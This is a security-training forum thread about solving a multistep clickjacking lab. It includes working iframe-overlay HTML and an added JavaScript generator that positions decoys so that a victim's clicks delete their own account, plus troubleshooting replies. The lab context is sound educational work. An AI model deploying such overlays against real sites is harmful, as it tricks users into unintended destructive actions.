Burp Suite User Forum


multistep clickjacking

shubham | Last updated: Feb 01, 2022 07:06PM UTC

<style>
  iframe { position:relative; width: 500px; height: 700px; opacity: 0.0001; z-index: 2; }
  .firstClick, .secondClick { position:absolute; top:410px; left:60px; z-index: 1; }
  .secondClick { left:60px; top:510px; }
</style>
<div class="firstClick">Click me first</div>
<div class="secondClick">Click me next</div>
<iframe src="https://ac3d1fd71f177443c078af8700590090.web-security-academy.net/my-account"></iframe>

I'm stuck at this lab, tried 10 times, please help.

Ben, PortSwigger Agent | Last updated: Feb 02, 2022 08:45AM UTC

Hi Shubham,

The exploit that you are entering within the Exploit Server is not meeting the requirements to solve the lab. Have you used the 'View exploit' functionality in order to double check that the 'Click me first' element lines up with the 'Delete' button and the 'Click me next' element lines up with the 'Yes' button (used to subsequently confirm that you wish to delete the user account after the 'Delete' button has been pressed)? From the values that you have used, it looks like the 'Click me first' element is lined up with the 'Update email' button and the 'Click me next' element is lined up with the 'Delete' button (which is incorrect). The written solution provides a good guide on how to do this if you are stuck.
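The alignment check Ben describes can be made mechanical. The following is an added example, not code from this thread or from PortSwigger's lab solution: it models the geometry of a two-step clickjacking page (a near-transparent iframe over two decoy elements, one per step), derives each decoy's position from the position of the real control it must cover, and refuses to emit the page if either decoy overhangs its target. Every coordinate in it is constructed and hypothetical; the real positions of the 'Delete' and 'Yes' buttons have to be measured in the browser with 'View exploit' and the developer tools.

```javascript
// Added example, not code from the forum thread or from PortSwigger's lab solution.
// Models the geometry a multistep clickjacking page depends on: the victim page is
// framed at ~0 opacity, and one decoy per step is placed so the victim's click
// lands on the real control underneath. All coordinates are constructed; measure
// the real ones with the exploit server's "View exploit" and the dev tools.

// Hypothetical positions (CSS px) of the real controls, relative to the framed
// page's top-left corner. Not the lab's actual values.
const TARGETS = {
  del:     { left: 60, top: 410, width: 90, height: 32 }, // "Delete account" (step 1)
  confirm: { left: 60, top: 510, width: 50, height: 32 }, // "Yes" confirmation (step 2)
};

// Where the near-invisible iframe sits on the attacker's page (constructed).
const IFRAME = { left: 0, top: 0, width: 500, height: 700 };

// Translate a target's box into attacker-page coordinates, shrunk by `inset`
// so the decoy never overhangs the control it is meant to cover.
function decoyFor(target, iframe, inset = 2) {
  return {
    left:   iframe.left + target.left + inset,
    top:    iframe.top  + target.top  + inset,
    width:  target.width  - 2 * inset,
    height: target.height - 2 * inset,
  };
}

// A decoy is aligned only if it has positive size and its whole box lies inside
// the target's box; a partial overlap means some victim clicks hit nothing useful.
function isAligned(decoy, target, iframe) {
  const tl = iframe.left + target.left;
  const tt = iframe.top + target.top;
  return decoy.width > 0 && decoy.height > 0 &&
         decoy.left >= tl && decoy.top >= tt &&
         decoy.left + decoy.width  <= tl + target.width &&
         decoy.top  + decoy.height <= tt + target.height;
}

// Emit the exploit page. Decoys sit under the iframe (z-index 1 vs 2) so the
// click reaches the frame while the decoy text stays visible through it.
function buildPage(frameUrl, steps, iframe) {
  const rules = steps.map(s =>
    `.${s.cls}{position:absolute;left:${s.decoy.left}px;top:${s.decoy.top}px;` +
    `width:${s.decoy.width}px;height:${s.decoy.height}px;z-index:1}`).join("\n");
  const divs = steps.map(s => `<div class="${s.cls}">${s.label}</div>`).join("\n");
  return [
    "<style>",
    `iframe{position:absolute;left:${iframe.left}px;top:${iframe.top}px;` +
    `width:${iframe.width}px;height:${iframe.height}px;opacity:0.0001;z-index:2}`,
    rules,
    "</style>",
    divs,
    `<iframe src="${frameUrl}"></iframe>`,
  ].join("\n");
}

// Assemble both steps and refuse to emit a page whose decoys do not line up.
function buildTwoStepPage(frameUrl, targets = TARGETS, iframe = IFRAME) {
  const steps = [
    { cls: "firstClick",  label: "Click me first", target: targets.del },
    { cls: "secondClick", label: "Click me next",  target: targets.confirm },
  ].map(s => ({ ...s, decoy: decoyFor(s.target, iframe) }));
  const misaligned = steps.filter(s => !isAligned(s.decoy, s.target, iframe));
  if (misaligned.length) {
    throw new Error("decoy(s) off target: " + misaligned.map(s => s.cls).join(", "));
  }
  return buildPage(frameUrl, steps, iframe);
}

// Placeholder URL; substitute the lab's own /my-account URL.
const PAGE = buildTwoStepPage("https://YOUR-LAB-ID.web-security-academy.net/my-account");
console.log(PAGE);
```

Run it with Node and paste the printed HTML into the exploit server, then still confirm with 'View exploit' that each decoy covers the intended button: the inset shrinks the decoy slightly inside the target, and the page is only emitted when both decoys pass the containment check, which is exactly what fails when the coordinates put 'Click me first' over 'Update email' instead of 'Delete'.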

Adrian | Last updated: May 22, 2023 12:22PM UTC

Hey, the issue I face with this lab is that it shows the login page instead of the /my-account page. Even though I watched a few videos online and am doing the same thing, the issue is that /login appears instead of /my-account. In this line: <iframe src="YOUR-LAB-ID.web-security-academy.net/my-account"></iframe> it redirects in "view exploit" to /login, but not to my account, which is strange.

Ben, PortSwigger Agent | Last updated: May 22, 2023 01:06PM UTC

Hi, Have you logged in prior to creating your exploit?

Adrian | Last updated: May 23, 2023 10:46AM UTC

Hello Ben, yes, I've been following the steps one by one multiple times and still encounter this issue. My colleague and I are working on it together and he is getting the same issue on his side. Could you please look into it?

Ben, PortSwigger Agent | Last updated: May 24, 2023 10:07AM UTC

Hi Adrian, as noted in the lab, are you trying this using a Chrome browser to mimic the victim user? Using the embedded browser, logging in to the lab and then configuring my attack (making sure to view the exploit to confirm the two click elements line up with the requisite buttons) allows me to successfully deliver the attack and solve the lab.
